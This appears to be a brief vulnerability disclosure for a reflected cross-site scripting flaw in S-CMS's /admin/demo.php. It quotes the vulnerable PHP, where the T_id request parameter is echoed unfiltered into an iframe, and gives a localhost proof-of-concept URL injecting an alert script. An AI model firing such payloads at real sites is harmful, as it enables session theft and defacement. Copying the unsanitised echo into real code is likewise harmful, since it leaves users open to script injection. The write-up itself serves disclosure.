scms-xss

Vulnerability overview

/admin/demo.php exists in reflection xss

Vulnerability analysis

$T_id parameter is not filtered for direct output

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
<?php
require '../conn/conn2.php';
require '../conn/function.php';
$T_id=$_GET["T_id"];
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>网站演示</title>
<style>
body{
font-family:"微软雅黑";
margin:0;
padding:0;
overflow-x:hidden;
overflow-y:hidden;
}
a{ font-size:12px; color:#999999; text-decoration:none;}
a:hover {color:#FFFFFF;}

.box{width:450px; height:600px;background:#FFFFFF;box-shadow:0px 0px 20px #999999; padding:20px; text-align:center;position:absolute;left:50%; top:50%; margin-left:-230px; margin-top:-300px;}
.box img{ border:#CCCCCC solid 2px; padding:10px; margin:10px; box-shadow:0px 0px 10px #999999;}
</style>
<script>
function alertWin(){
float=document.getElementById("float");
float2=document.getElementById("float2");
float.style.position="absolute";
float.style.height=(document.documentElement.clientHeight-50)+"px";
float.style.width=(document.documentElement.clientWidth)+"px";
float.style.zIndex="50";
float.style.top="50px";
window.onresize = function(){
float.style.position="absolute";
float.style.height=(document.documentElement.clientHeight-50)+"px";
float.style.width=(document.documentElement.clientWidth)+"px";
float.style.zIndex="50";
float.style.top="50px";
}
float.innerHTML="<iframe src='http://demo.s-cms.cn/<?php echo $T_id?>' frameBorder='0' width='100%' height='100%'></iframe>"
}
</script>
</head>

POC

http://127.0.0.1/scms/admin/demo.php?T_id="><script>alert(/xss/)</script><
poc